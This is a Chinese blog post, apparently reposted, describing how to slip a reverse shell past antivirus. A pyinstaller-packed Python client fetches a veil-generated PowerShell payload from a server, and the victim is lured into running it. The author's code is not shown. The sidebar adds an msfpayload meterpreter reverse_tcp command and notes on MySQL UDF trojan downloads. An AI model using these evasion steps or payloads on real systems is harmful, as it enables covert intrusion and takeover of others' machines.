如何优雅的绕过杀软获取系统权限

最新推荐文章于 2024-09-26 09:10:25 发布
最新推荐文章于 2024-09-26 09:10:25 发布
阅读量636 收藏 2
点赞数
分类专栏: 信安之路 文章标签: web安全
原文链接:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247485670&idx=1&sn=26a0f04dd2ee0d80b418f359b8f5a3e7&chksm=ec1e38cedb69b1d8149a301324a371f2c4cef13e7a9ceb57ddc3a70cfcda4e207ea7655c880e&token=511550348&lang=zh_CN#rd
版权

本文内容带有一定的攻击性,仅供学习交流使用,严禁用于非法用途

杀毒软件判断病毒木马的方式如下:

特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。

云扫描法:将可疑文件上传到云服务器进行检查。需要网络连接。

虚拟机脱壳法:使用虚拟机引擎进行文件脱壳(仅支持部分壳类型)。脱壳后的文件将会进一步接受上两种扫描方式的检查。

虽然 github 上有许多大牛写的脚本可以生成免杀的 payload,但往往都好景不长,所以今天给大家分享一下我用的绕过杀软获取系统权限的思路

测试可过的杀软有:

  • 卡巴斯基

  • 360

  • 腾讯电脑管家

其他的也就没测试了,因为国内大多人也用的360和腾讯电脑管家

0×01 思路

文件本身不报毒,通过客户端和服务端的通信来达到目的。

服务端长期在线,客户端一旦连接服务端,服务端立即将 payload 发送给客户端,客户端再以系统命令执行,即可得到 shell

0×02 环境

Kali Linux 2017.1 (服务端和 msf 接收端 192.168.1.108)

Windows 10 (靶机 192.168.1.100)

python 2.7

需要用到的模块:

socket

os

0×03 开干吧

1.首先生成 powershell 的反弹 payload

这里我使用的是 veil-evasion

因为前几天把 kali 更新到 2017.3 过后,发现用不了了(求大佬解决)

所以又恢复快照使用的 2017.1 的版本

配置 payload

生成的 payload

2.编写服务端

一个简单的服务端的创立需要以下几个步骤

  • 创建套接字并绑定 IP 和端口

  • 设置监听数量

  • 开始监听

  • 发送数据

贴上我写的源码吧,很辣鸡,大佬轻喷

3.创建客户端

一个简单的客户端的创立需要以下几个步骤

  • 创建套接字

  • 连接服务端的IP和端口

  • 接收数据

贴上我的源码,很辣鸡,大佬轻喷

4.将客户端编译成 exe 可执行文件

利用 pyinstaller

5.诱导靶机执行

  • 1.开启服务端

  • 2.使用 msf exploit/multi/handler 模块

  • 3.诱导靶机运行 exe 文件

0×04 写在最后

pyinstaller -F 生成的文件启动是不会自动提权,即不会触发 UAC,所以反弹的 shell 也没有管理员权限,希望有大佬帮忙解惑

myh0st@信安之路
关注
专栏目录
绕过杀软的各种姿势
CODING...
01-17 3993
1.payload免杀工具---veil-evasion的使用: 在kali上用apt-get install veil-evasion先自动安装好: 成功安装之后可以看到有46个payload可以使用 可以使用list命令列出看可以使用的payload 、 这里我们使用5号payload进行尝试: 设置好一些必要的参数: 然后generate就可以了, 生
android 绕过动态权限,Android6.0动态权限最简单的解决方法
weixin_33529455的博客
05-25 848
前言:动态权限管理是Android6.0(B>uild.VERSION_CODES.M =Api23)推出的,提醒用户当前APP所需>要的权限,防止滥用。这些权限一般分为三种:(1)普通权限:直接manifest清单文件中写上注册就行了(2)危险权限:需要动态申请(3)特殊权限:一般用不上。原声的动态权限管理很麻烦,代码也不够优雅,因此就有很多的动态权限管理库,比较出名一点的有:Eas...
使用Metasm来绕过杀毒软件
iteye_16188的博客
09-30 485
技术本质还是花指令,本文的目的是使用metasploit框架来生成raw payload,反汇编payload,使用花指令,然后重新编译成二进制可执行文件 1. msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 R > raw_binary 2.拷贝metasm.rb文件和metasm文件夹到rub...
免杀手段另辟蹊径!可轻松绕过近90%杀软【附带反制教程】
最新发布
2401_84215240的博客
09-26 1087
众所周知,免杀技术一直是网络安全技术的一个重头戏在日新月异的网络安攻防时代,各种木马免杀手法层出不穷,从单一特征码到复合特征码,杀软防御手段也从无主动防御到有主动防御,一直不断地在演变着。但很多木马免杀技术都只是停留在对特征码的混淆上,也就是代码绕过层面。但是,传统的木马都是两点一线的远控,一个被控制端,一个远程控制端,高级一点的会构建一套大型的僵尸网络系统,其本质没有太大的变化,都是控制端和被控制端的直接传输。
杀软工作原理以及如何免杀绕过
Makboli的博客
10-12 1600
【免杀】五分钟简单了解一下免杀马
绕过杀软(二)——免杀exe文件(360、火绒免杀)
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
绕过杀毒软件易语言源码
09-08
绕过杀毒软件 软件顺利运行软件
spring security动态配置url权限的2种实现方法
08-27
虽然自定义Filter可以实现动态权限判断,但这并不符合Spring Security的设计原则,因为这会使你绕过框架提供的安全机制。自定义Filter需要自己处理认证、授权等逻辑,增加了代码复杂性和维护成本。但如果你的业务...
element-admin 登陆,路由跳转,权限逻辑
01-20
`element-admin`是一个基于Vue.js的后台管理系统模板,它集成了Element UI组件库和Vuex状态管理,提供了丰富的功能和优雅的界面设计。 在部署`element-admin`到服务器时,作者遇到了一个问题:打包后无法跳转到主页...
【项目实践】一文带你搞定页面权限、按钮权限以及数据权限
RudeCrab的博客
11-09 2332
各个维度的权限统统搞定
360免杀提权工具,过市面常见杀软
04-09
360免杀提权工具,过市面常见杀软!360免杀提权工具,过市面常见杀软!360免杀提权工具,过市面常见杀软
解决AJAX中跨域访问出现'没有权限'的错误
10-30
1. JSONP(JSON with Padding):利用`<script>`标签的特性,绕过同源策略限制。通常需要服务器支持,因为需要在服务器端进行相应的处理,将JSON数据放在一个回调函数中返回,浏览器端的脚本会通过创建一个`<script>...
Windows提权
05-22 476
提权的概念 提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。----百度百科,当然这里单指WEBshell格局小了。 拿下shell之后,首先要苟住对机器进行基本信息收集之后再进行提权,要注意主机是否安装主机安全设备、杀软安全软件,防止被管理员发现告警信息,导致好不容易获取到的shell丢失。 Windows 提权 系统漏洞提权 系统漏洞提权,这种方式适用于Windows、Linux系统,针对系统存在漏洞又没有打补丁的情况进行
绕过杀毒软件,免杀木马制作
qq_43678263的博客
08-30 2076
绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例)
mysql 5.5 提权,MYSQL5.5当CMDshell无法执行的时候提权解决方法
weixin_34996026的博客
03-17 240
MYSQL5.5如果没有LIB目录权限允许的情况下,可以新建,在此帖子中可以正常导出DLL,但是执行CMDSHELL的时候,执行出错,我们在这里有两个方法可以考虑1、利用downloader函数,下载一个木马或者脚本到启动项CreateFunctiondownloaderreturnsstringsoname'moonudf.dll';selectdownloader("http:/...
mysql 提权_MYSQL提权总结
weixin_42515024的博客
01-18 532
经擦遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL WindowsRemote System Level Exploit (Stuxnet...
绕过杀软(一)—— PowerShell 进程隐藏与 NetCat进行联动
W小哥
06-11 2064
前提: 通过某些技术手段已 geshell攻击机: 192.168.32.1(win 10)、192.168.32.133(kali) 靶机: 192.168.32.1(win10 WEB网站phpstudy 安装杀软360、电脑管家)因为上线cs、nc联动的命令或者脚本需要使用到 poweshell因为安装了360和火绒的服务器。在执行exe文件的时候杀毒软件会阻止exe运行 如下图执行wxiaoge.exe文件都被360阻止 执行 poweshell 命令会调用到powershell.exe文件也被
MOF技术在绕过杀软中的应用探索
文章中提到的绕过杀软的方法是通过不断调整MOF文件的执行逻辑,以避开杀软的检测。在早期版本的Windows中,可以直接通过拖放到特定目录下自动执行MOF文件,但在新版本中,需要借助`mofcomp`工具来编译和执行。作者在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值